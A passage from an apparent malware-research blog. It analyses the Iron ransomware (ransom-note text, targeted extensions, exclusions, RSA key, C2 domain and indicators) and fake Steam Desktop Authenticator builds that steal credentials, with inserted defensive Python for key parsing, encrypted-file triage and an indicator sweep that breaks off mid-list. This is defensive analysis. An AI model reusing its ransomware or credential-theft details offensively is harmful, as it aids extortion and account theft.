<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Payment portal<br />
<br /></td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-f84vjna_d4s/Ws0BeXxIfnI/AAAAAAAAB-w/WjUuCnM4NbkzfNymbKKvtj_4_T5o8n-6ACLcBGAs/s1600/r1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="799" data-original-width="978" height="261" src="https://3.bp.blogspot.com/-f84vjna_d4s/Ws0BeXxIfnI/AAAAAAAAB-w/WjUuCnM4NbkzfNymbKKvtj_4_T5o8n-6ACLcBGAs/s320/r1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Hello! (after entering the personal ID)</td></tr>
</tbody></table>
The text reads:<br />
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…</i></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-d4I-9W0OrSE/Ws0BeTvjsHI/AAAAAAAAB-4/lfnSJlo2x2Q9owX1DiLmhhGVNPUAqDmlACLcBGAs/s1600/r2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="735" data-original-width="967" height="243" src="https://4.bp.blogspot.com/-d4I-9W0OrSE/Ws0BeTvjsHI/AAAAAAAAB-4/lfnSJlo2x2Q9owX1DiLmhhGVNPUAqDmlACLcBGAs/s320/r2.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - "We are not lying"</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-EVMOjtrOle8/Ws0Be2VNkPI/AAAAAAAAB-8/Wr6JzHmcFecpIiM4GAxdYzk_t4z8AxRlQCLcBGAs/s1600/r3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="690" data-original-width="944" height="233" src="https://1.bp.blogspot.com/-EVMOjtrOle8/Ws0Be2VNkPI/AAAAAAAAB-8/Wr6JzHmcFecpIiM4GAxdYzk_t4z8AxRlQCLcBGAs/s320/r3.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Ransomware cost</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-GJynOkFvcEg/Ws0BfEx6QeI/AAAAAAAAB_A/wQFz9mp1rYk_y5WOLGh-SPf-g-WAmIWFACLcBGAs/s1600/r4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="552" data-original-width="987" height="178" src="https://1.bp.blogspot.com/-GJynOkFvcEg/Ws0BfEx6QeI/AAAAAAAAB_A/wQFz9mp1rYk_y5WOLGh-SPf-g-WAmIWFACLcBGAs/s320/r4.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Where to pay</td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-l1iZrqLQr4Q/Ws0BfBeBdFI/AAAAAAAAB_E/43dQV6gYjZQbxpP-SpsZNje1EfApZS2JgCLcBGAs/s1600/r5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="753" data-original-width="1247" height="193" src="https://2.bp.blogspot.com/-l1iZrqLQr4Q/Ws0BfBeBdFI/AAAAAAAAB_E/43dQV6gYjZQbxpP-SpsZNje1EfApZS2JgCLcBGAs/s320/r5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7 - Last but not least: how to buy Bitcoins</td></tr>
</tbody></table>
In previous versions of Maktub, you could decrypt 1 file for free, however, with the current rebranding, this option has disappeared. Since the ransomware has rebranded, we'll name it "Iron" or "Iron ransomware", due to the name of the decrypter, <i>IronUnlocker</i>.<br />
<br />
Iron encrypts a whopping total of <b>374</b> extensions; these are as follows:<br />
<br />
<blockquote class="tr_bq">
<i>.001, .1cd, .3fr, .8ba, .8bc, .8be, .8bf, .8bi8, .8bl, .8bs, .8bx, .8by, .8li, .DayZProfile, .abk, .ade, .adpb, .adr, .aip, .amxx, .ape, .api, .apk, .arch00, .aro, .arw, .asa, .ascx, .ashx, .asmx, .asp, .asr, .asset, .bar, .bay, .bc6, .bc7, .bi8, .bic, .big, .bin, .bkf, .bkp, .blob, .blp, .bml, .bp2, .bp3, .bpl, .bsa, .bsp, .cab, .cap, .cas, .ccd, .cch, .cer, .cfg, .cfr, .cgf, .chk, .class, .clr, .cms, .cod, .col, .con, .cpp, .cr2, .crt, .crw, .csi, .cso, .css, .csv, .ctt, .cty, .cwf, .d3dbsp, .dal, .dap, .das, .db0, .dbb, .dbf, .dbx, .dcp, .dcr, .dcu, .ddc, .ddcx, .dem, .der, .desc, .dev, .dex, .dic, .dif, .dii, .disk, .dmg, .dmp, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .dvd, .dxg, .elf, .epk, .eql, .erf, .esm, .f90, .fcd, .fla, .flp, .for, .forge, .fos, .fpk, .fpp, .fsh, .gam, .gdb, .gho, .grf, .h3m, .h4r, .hkdb, .hkx, .hplg, .htm, .html, .hvpl, .ibank, .icxs, .img, .indd, .ipa, .iso, .isu, .isz, .itdb, .itl, .itm, .iwd, .iwi, .jar, .jav, .java, .jpe, .kdc, .kmz, .layout, .lbf, .lbi, .lcd, .lcf, .ldb, .ldf, .lgp, .litemod, .lng, .lrf, .ltm, .ltx, .lvl, .m3u, .m4a, .map, .mbx, .mcd, .mcgame, .mcmeta, .md0, .md1, .md2, .md3, .mdb, .mdbackup, .mddata, .mdf, .mdl, .mdn, .mds, .mef, .menu, .mm6, .mm7, .mm8, .moz, .mpq, .mpqge, .mrwref, .mxp, .ncf, .nds, .nrg, .nri, .nrw, .ntl, .odb, .odf, .odp, .ods, .odt, .orf, .owl, .oxt, .p12, .p7b, .p7c, .pab, .pbp, .pef, .pem, .pfx, .pkb, .pkh, .pkpass, .plc, .pli, .pot, .potm, .potx, .ppf, .ppsm, .pptm, .prc, .prt, .psa, .pst, .ptx, .pwf, .pxp, .qbb, .qdf, .qel, .qic, .qpx, .qtr, .r3d, .raf, .re4, .res, .rgn, .rgss3a, .rim, .rofl, .rrt, .rsrc, .rsw, .rte, .rw2, .rwl, .sad, .sav, .sc2save, .scm, .scx, .sdb, .sdc, .sds, .sdt, .shw, .sid, .sidd, .sidn, .sie, .sis, .slm, .slt, .snp, .snx, .spr, .sql, .sr2, .srf, .srw, .std, .stt, .sud, .sum, .svg, .svr, .swd, .syncdb, .t01, .t03, .t05, .t12, .t13, .tar.gz, .tax, .tcx, .thmx, .tlz, .tor, .torrent, .tpu, .tpx, .ttarch2, .tur, .txd, .txf, .uax, .udf, .umx, .unity3d, .unr, .uop, 
.upk, .upoi, .url, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vcd, .vdf, .ver, .vfs0, .vhd, .vmf, .vmt, .vpk, .vpp_pc, .vsi, .vtf, .w3g, .w3x, .wad, .war, .wb2, .wdgt, .wks, .wmdb, .wmo, .wotreplay, .wpd, .wpl, .wps, .wtd, .wtf, .x3f, .xla, .xlam, .xlc, .xlk, .xll, .xlm, .xlr, .xlsb, .xltx, .xlv, .xlwx, .xpi, .xpt, .yab, .yps, .z02, .z04, .zap, .zipx, .zoo, .ztmp</i></blockquote>
<div>
<br /></div>
<div>
Iron doesn't spare gamers, as it will also encrypt Steam files (.vdf), World of Tanks replays (.wotreplay), DayZ profiles (.DayZProfile), and possibly others.</div>
<div>
<br /></div>
<div>
Folders containing the following words are exempt from encryption:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>Windows, windows, Microsoft, Mozilla Firefox, Opera, Internet Explorer, Temp, Local, LocalLow, $Recycle.bin, boot, i386, st_v2, intel, recycle, 360rec, 360sec, 360sand, internet explorer, msbuild</i></blockquote>
<br />
Interestingly enough, <i>360sec</i>, <i>360rec</i>, and <i>360sand</i> belong to antivirus software developed by Qihoo 360, an internet security company based in China (360 Total Security is one example). This, together with the fact that the Iron ransomware also includes resources in Simplified Chinese, suggests this variant may have been developed by a Chinese speaker.<br />
<br />
The ransomware will additionally delete the original files after encryption, and will also empty the recycle bin. It does <b>not</b> remove Shadow Volume Copies or Restore Points.<br />
<br />
Iron embeds a public RSA key as follows:<br />
<br />
<blockquote>
<i>-----BEGIN RSA PUBLIC KEY-----<br />MIGJAoGBAIOYf0KqEOGaxdLmMLypMyZ1q/K+r6DuCdYpwZfs0EPug3ye7UjZa0QMOP5/OySr<br />l/uBJtkmEghEtUEo/zfcBJ7332O1ytJ7/ebIUv+ZcN1Rlswzdv7uZxYRC8u1HvrgBvAz4Atb<br />zx+FbFVqLB0gGixYTqbjqANq21AR6r91+oJtAgMBAAE=<br />-----END RSA PUBLIC KEY-----</i></blockquote>
<br />
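<div>
Two embedded RSA public keys appear on this page: Iron's PEM block above, which is a PKCS#1 RSAPublicKey (a DER SEQUENCE of two INTEGERs), and the Modulus/Exponent pair from Spartacus's .NET RSAKeyValue XML in the earlier post (that XML carries only Modulus and Exponent, i.e. the public half of a key pair). As an added example, not code from either post, the following Python parses both with the standard library only and reports key size and exponent; the minimal DER reader is written for this example and handles only what these keys need.</div>

```python
import base64

# Key material copied from the blog posts above.
IRON_PEM = """-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAIOYf0KqEOGaxdLmMLypMyZ1q/K+r6DuCdYpwZfs0EPug3ye7UjZa0QMOP5/OySr
l/uBJtkmEghEtUEo/zfcBJ7332O1ytJ7/ebIUv+ZcN1Rlswzdv7uZxYRC8u1HvrgBvAz4Atb
zx+FbFVqLB0gGixYTqbjqANq21AR6r91+oJtAgMBAAE=
-----END RSA PUBLIC KEY-----"""

# Modulus and Exponent elements of Spartacus's RSAKeyValue XML.
SPARTACUS_MODULUS_B64 = "xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ=="
SPARTACUS_EXPONENT_B64 = "AQAB"


def der_read_tlv(buf, pos):
    """Decode one DER tag-length-value starting at buf[pos].
    Returns (tag, value_bytes, position_after_value). Supports short-form
    lengths and long-form lengths (0x81, 0x82, ...), which is all PKCS#1
    public keys use. Written for this example, not a general ASN.1 parser."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        num_len_bytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + num_len_bytes], "big")
        pos += num_len_bytes
    return tag, buf[pos:pos + length], pos + length


def parse_pkcs1_public_key(pem_text):
    """Parse a '-----BEGIN RSA PUBLIC KEY-----' block into (n, e)."""
    body = "".join(line for line in pem_text.splitlines()
                   if not line.startswith("-----"))
    der = base64.b64decode(body)
    tag, seq, _ = der_read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected outer SEQUENCE")
    tag_n, n_bytes, pos = der_read_tlv(seq, 0)
    tag_e, e_bytes, _ = der_read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected two INTEGERs (modulus, exponent)")
    # DER INTEGERs are big-endian two's complement; a leading 0x00 keeps the
    # modulus positive and is absorbed by int.from_bytes.
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def parse_dotnet_rsakeyvalue(modulus_b64, exponent_b64):
    """.NET RSAKeyValue stores Modulus and Exponent as base64 of raw,
    unsigned, big-endian integers (no DER framing)."""
    n = int.from_bytes(base64.b64decode(modulus_b64), "big")
    e = int.from_bytes(base64.b64decode(exponent_b64), "big")
    return n, e


def describe(n, e):
    """Quick sanity facts an analyst wants from an embedded key."""
    return {"bits": n.bit_length(), "exponent": e, "odd_modulus": n % 2 == 1}


if __name__ == "__main__":
    print("Iron:", describe(*parse_pkcs1_public_key(IRON_PEM)))
    print("Spartacus:", describe(*parse_dotnet_rsakeyvalue(
        SPARTACUS_MODULUS_B64, SPARTACUS_EXPONENT_B64)))
```

<div>
Exponent AQAB decodes to 65537, the usual public exponent. Iron's modulus is 1024 bits, below current key-size recommendations, while Spartacus's is 2048 bits; in both cases a file key wrapped with the public key can only be unwrapped with the author's private key, which is why the conclusion below relies on Shadow Volume Copies and file recovery tools rather than decryption.</div>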
The Iron ransomware will determine the user's WAN IP and also send a POST request to its C2 server, <b>http://y5mogzal2w25p6bn[.]ml</b>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-5nd9bNYrlmU/Ws0GJ4iQBnI/AAAAAAAAB_s/KS0PzRk8oVUjKVqqpUAr1cjjbz-_2CRNQCLcBGAs/s1600/traffic.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="1244" height="151" src="https://4.bp.blogspot.com/-5nd9bNYrlmU/Ws0GJ4iQBnI/AAAAAAAAB_s/KS0PzRk8oVUjKVqqpUAr1cjjbz-_2CRNQCLcBGAs/s400/traffic.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8 - Traffic<br />
<br /></td></tr>
</tbody></table>
</div>
<div>
It appears Iron will create a new, random GUID, and use it as a mutex, in order to not infect the machine twice. The following values will be sent to the C2:</div>
<div>
<br /></div>
<div>
<ul>
<li>Encryption key;</li>
<li>Randk (seed);</li>
<li>GUID (mutex);</li>
<li>Start (whether ransom successfully started);</li>
<li>Market (unknown).</li>
</ul>
<div>
The C2 server will then respond with another set of values, and generate a <i>unique</i> Bitcoin address, which means that victims may pay twice to different addresses. Rule of thumb: do <b>not</b> pay the ransom.</div>
</div>
<div>
<br /></div>
<div>
Of note is an email address in the response: <i>oldblackjack@outlook.com</i>.</div>
<div>
<br /></div>
<div>
Iron will additionally save certain values, such as the GUID, in <i>HKCU\Software\CryptoA:</i></div>
<div>
<i><br /></i></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-A0nhF6epUTM/Ws0Ll1Wa7GI/AAAAAAAAB_8/GU-KDREGxzkcouM_xCTynrpgEJxyPIZIQCLcBGAs/s1600/Regkey.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="144" data-original-width="1119" height="51" src="https://4.bp.blogspot.com/-A0nhF6epUTM/Ws0Ll1Wa7GI/AAAAAAAAB_8/GU-KDREGxzkcouM_xCTynrpgEJxyPIZIQCLcBGAs/s400/Regkey.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9 - Registry values (click to enhance)</td></tr>
</tbody></table>
<br />
Encrypted files will have the <b>.encry </b>extension appended. It is likely not possible to restore data.</div>
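<div>
The three posts on this page describe three different file-naming schemes: Spartacus appends .[email].Spartacus to the full name, CryptoWire inserts .encrypted before the original extension, and Iron appends .encry. As an added example (not code from any of the posts), this Python helper recognises those schemes, recovers the original file name for an inventory, and lists the ransom notes named on the page to look for. The Spartacus pattern is generalised to any bracketed email address; the sample file names are constructed.</div>

```python
import re
from collections import Counter

# (family, pattern, ransom note named in the post or None). The regex groups
# concatenate to the original file name. Patterns are written for this example.
SCHEMES = [
    ("Spartacus", re.compile(r"^(.+)\.\[[^\]]+\]\.Spartacus$"), "READ ME.txt"),
    ("CryptoWire", re.compile(r"^(.+)\.encrypted(\.[^.]+)$"), None),
    ("Iron", re.compile(r"^(.+)\.encry$"), "!HELP_YOUR_FILES.HTML"),
]

# Constructed sample directory listing.
SAMPLE_FILES = [
    "Penguins.jpg.[MastersRecovery@protonmail.com].Spartacus",
    "Tulips.encrypted.png",
    "report.docx.encry",
    "budget.xlsx.encry",
    "notes.txt",
]


def classify_encrypted_name(filename):
    """Return (family, original_name). family is None when no scheme matches,
    in which case the name is returned unchanged."""
    for family, pattern, _note in SCHEMES:
        match = pattern.match(filename)
        if match:
            return family, "".join(match.groups())
    return None, filename


def triage(filenames):
    """Summarise a listing: per-family counts, the ransom notes worth looking
    for given the families seen, and how many names matched nothing."""
    counts = Counter()
    unmatched = 0
    for name in filenames:
        family, _original = classify_encrypted_name(name)
        if family is None:
            unmatched += 1
        else:
            counts[family] += 1
    notes = sorted({note for fam, _p, note in SCHEMES
                    if note and fam in counts})
    return {"counts": dict(counts), "notes": notes, "unmatched": unmatched}


if __name__ == "__main__":
    for name in SAMPLE_FILES:
        print(name, "->", classify_encrypted_name(name))
    print(triage(SAMPLE_FILES))
```

<div>
Recovering the original name matters for an inventory of what was hit; it does not, of course, recover the content. The Spartacus rule is tried first because its suffix is the most specific, and the Iron rule matches only a bare .encry suffix, so CryptoWire's .encrypted infix is never mistaken for it.</div>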
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b><br />
<div>
<i><br /></i></div>
<div>
It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example.<br />
<br />
We know the Iron ransomware has mimicked at least three ransomware families:<br />
<ul>
<li><b>Maktub</b> (payment portal design)</li>
<li><b>DMA Locker </b>(Iron Unlocker, decryption tool)</li>
<li><b>Satan</b> (exclusion list)</li>
</ul>
<div>
From the screenshots above, it is obvious the portal design has been copy-pasted from Maktub.</div>
<div>
<br /></div>
<div>
As for copying from DMA Locker, see this tweet:</div>
<div>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en">
<div dir="ltr" lang="en">
and BTW, their unlocker looks like they copied layout from DMA Locker (<a href="https://t.co/FFWzMpQ6hu">https://t.co/FFWzMpQ6hu</a>) <a href="https://t.co/HWZXGtc2i7">pic.twitter.com/HWZXGtc2i7</a></div>
— hasherezade (@hasherezade) <a href="https://twitter.com/hasherezade/status/983885077829640192?ref_src=twsrc%5Etfw">April 11, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
</div>
<div>
<br />
And, last but not least, it uses the exact same exclusion list (folders whose contents will <i>not</i> be encrypted) as Satan:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
Just to clarify, there isn't specific code overlap, as the crypto is quite different to Satan. However, there are similarities in a number of things, such as the exclusion list. <a href="https://t.co/OHkFimJ3g7">https://t.co/OHkFimJ3g7</a> <a href="https://t.co/ub6hOnucgn">pic.twitter.com/ub6hOnucgn</a></div>
— Bart (@bartblaze) <a href="https://twitter.com/bartblaze/status/984173690035363840?ref_src=twsrc%5Etfw">April 11, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
</div>
</div>
<div>
The code is indeed quite unique: Iron seems like an entirely new ransomware, and may even be a "side project" of the creators of the Satan ransomware. However, at this point there is no sure way of telling who is behind Iron. Time may tell.<br />
<br />
<b>Decryption</b> is impossible without the author's private key. However, it is possible to restore files using Shadow Volume Copies, or alternatively <a href="https://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a>. If that doesn't work, you may try a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a>.<br />
<br /></div>
<div>
Keep an eye on <a href="https://id-ransomware.malwarehunterteam.com/" target="_blank">ID ransomware</a> in case a decryptor should ever become available; it can also identify other families of ransomware if you are ever affected. Another service to take note of in this regard is <a href="https://www.nomoreransom.org/" target="_blank">NoMoreRansom</a>.</div>
<div>
<br /></div>
<div>
For preventing ransomware, have a look here:</div>
<div>
<a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">Ransomware Prevention</a></div>
<div>
<br /></div>
<div>
In short: <b>create backups</b>!<br />
<br />
Questions, comments, feedback or help: leave a comment below or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<b>Indicators</b>:<br />
<br /></div>
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #104E8B;
color: #FFF;
font-weight: bold;
}
</style>
<table class="tableizer-table">
<thead><tr class="tableizer-firstrow"><th>Indicator type</th><th>Indicator</th></tr></thead><tbody>
<tr><td>email</td><td>oldblackjack@outlook.com</td></tr>
<tr><td>domain</td><td>y5mogzal2w25p6bn.ml</td></tr>
<tr><td>FileHash-SHA256</td><td>19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</td></tr>
<tr><td>URL</td><td>http://y5mogzal2w25p6bn.ml</td></tr>
<tr><td>URL</td><td>http://y5mogzal2w25p6bn.ml/receive</td></tr>
<tr><td>FileHash-MD5</td><td>1e60050db59e3d977d2a928fff3d34a6</td></tr>
<tr><td>FileHash-SHA1</td><td>f51bab89b4e4510b973df8affc2d11a4476bd5be</td></tr>
<tr><td>email</td><td>recoverfile@mail2tor.com</td></tr>
</tbody></table>
</div>
On AlienVault:
<script src="https://otx.alienvault.com/pulse/5acd10efc709df54564b6a4c.js"></script>
<br />
<div>
<i><br /></i></div>
</div>
<b><span style="font-size: large;">Fake Steam Desktop Authenticator steals account details</span></b><br />
Bart, 2018-02-25<br />
In this blog post, we'll have a quick look at fake versions of Steam Desktop Authenticator (SDA), which is a "desktop implementation of Steam's mobile authenticator app".<br />
<br />
<a href="https://steamrep.com/profiles/76561198052640461" target="_blank">Lava</a> from <a href="https://steamrep.com/" target="_blank">SteamRep</a> brought to my attention a fake version of SDA floating around, which may be attempting to steal your Steam credentials.<br />
<br />
Indeed, there are some fake versions - we'll discuss two of them briefly.<br />
<br />
<br />
<b><span style="font-size: large;">Fake version #1</span></b><br />
<br />
The first fake version can be found on steamdesktopauthenticator[.]com. Note that the site is live, and appears at the top of Google Search when searching for "Steam Desktop Authenticator".<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-DcNTiNR097o/WpH1N3-_ZOI/AAAAAAAAB9Q/Fe8ZfA-1qi4GXSIdsMgJgarfxDRagKmMACLcBGAs/s1600/SDA.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="450" data-original-width="815" height="176" src="https://4.bp.blogspot.com/-DcNTiNR097o/WpH1N3-_ZOI/AAAAAAAAB9Q/Fe8ZfA-1qi4GXSIdsMgJgarfxDRagKmMACLcBGAs/s320/SDA.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Fake SDA website</td></tr>
</tbody></table>
<br />
When downloading the ZIP file from the website and unzipping it, we notice exactly the same structure as when fetching the legitimate package, with one difference: the main executable has been modified.<br />
<br />
File details:<br />
<b>Name</b>: Steam Desktop Authenticator.exe<br />
<b>MD5 hash</b>: 872abdc5cf5063098c87d30a8fcd8414<br />
<b>File size</b>: 1,4446 KB<br />
<b>Version</b>: v1.0.9.1<br />
<br />
Note that the current and real SDA version is 1.0.8.1, and its original file size is 1,444 KB - 2 bytes of difference can mean a lot. Figures 2 and 3 below show the differences.<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ErdtcFk1sL4/WpM1NA85fCI/AAAAAAAAB9g/Z6OLNL48JN4pVQPzN1J0TiDLsBHsxfi9gCLcBGAs/s1600/SDA-2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="661" data-original-width="1022" height="257" src="https://4.bp.blogspot.com/-ErdtcFk1sL4/WpM1NA85fCI/AAAAAAAAB9g/Z6OLNL48JN4pVQPzN1J0TiDLsBHsxfi9gCLcBGAs/s400/SDA-2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Sending credentials to steamdesktopauthenticator[.]com</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoKufsC4T5m5w2c6qDanTp5g9wn_kvWSEG5eLe4mT5tVWGXwPkv8PBHJ6AGTEf1H4XoSR1A-dlPLSQ97EkVHU22b2QnO4mdZkLFN2Mdl_BtgsT5c0tCSBLm3x93OqolHsflRRAfkiihXH/s1600/SDA-3.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="633" data-original-width="738" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoKufsC4T5m5w2c6qDanTp5g9wn_kvWSEG5eLe4mT5tVWGXwPkv8PBHJ6AGTEf1H4XoSR1A-dlPLSQ97EkVHU22b2QnO4mdZkLFN2Mdl_BtgsT5c0tCSBLm3x93OqolHsflRRAfkiihXH/s400/SDA-3.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Sending credentials to steamdesktop[.]com</td></tr>
</tbody></table>
<br />
Indeed, it appears the executable also attempts to upload to a second website. Digging a bit further, we can also observe an email address associated with both domains: <i>mark.korolev.1990@bk[.]ru</i><br />
<br />
While I was unable to immediately find a malicious fork containing any of these domains, <i>Mark</i> has likely forked the original repository, made the changes and then deleted the fork. Another possibility is that the source was downloaded and simply modified. However, the former option is more than likely.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Fake version #2</span></b><br />
<br />
This fake version was discovered while attempting to locate <i>Mark</i>'s fork of the fake version above. Here we do have a malicious fork on GitHub, in which trade and market actions appear to be intercepted, as shown in Figure 4 below.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6GlL7SuQsag/WpM4Drtso7I/AAAAAAAAB90/BeAEou8nL84mVdh5v7uCn8NW4LXYZD0YQCLcBGAs/s1600/SDA-4.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="595" data-original-width="1581" height="150" src="https://2.bp.blogspot.com/-6GlL7SuQsag/WpM4Drtso7I/AAAAAAAAB90/BeAEou8nL84mVdh5v7uCn8NW4LXYZD0YQCLcBGAs/s400/SDA-4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Malicious SDA fork (click to enhance)</td></tr>
</tbody></table>
<br />
Currently, when trying to access the malicious site lightalex[.]ru with a bogus token, a simple "OK" is returned - it is currently unknown whether market modifications would be successful.<br />
<br />
Interestingly enough, when digging deeper into this particular domain, the IP address it is currently hosted on, 91.227.16[.]31, has hosted other SteamStealer domains before, for example cs-strike[.]ru and csgo-knives[.]net.<br />
<br />
The malicious fork has been reported to GitHub.<br />
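As an added example (not code from this post or from the SDA project), the Python check below combines the two things a defender can verify on a downloaded SDA build before trusting it: whether the executable's MD5 equals the tampered build's hash given above, and whether its bytes contain any of the domains or addresses named for either fake version, searched in both ASCII and UTF-16LE because .NET assemblies such as SDA store string literals as UTF-16LE. The sample buffers at the bottom are constructed stand-ins, not real samples.<br />

```python
"""Sweep a downloaded Steam Desktop Authenticator executable for the indicators
named in this post. Added example; not code from the post or the SDA project."""
import hashlib
import re
from typing import Dict, List

# Known-bad MD5 of the tampered "Steam Desktop Authenticator.exe" (from the post).
FAKE_SDA_MD5 = "872abdc5cf5063098c87d30a8fcd8414"

# Network indicators from both fake versions discussed in the post. The
# defanged "[.]" notation is restored so the strings match what a binary
# would actually contain.
SDA_INDICATORS = [
    "steamdesktopauthenticator.com",
    "steamdesktop.com",
    "mark.korolev.1990@bk.ru",
    "lightalex.ru",
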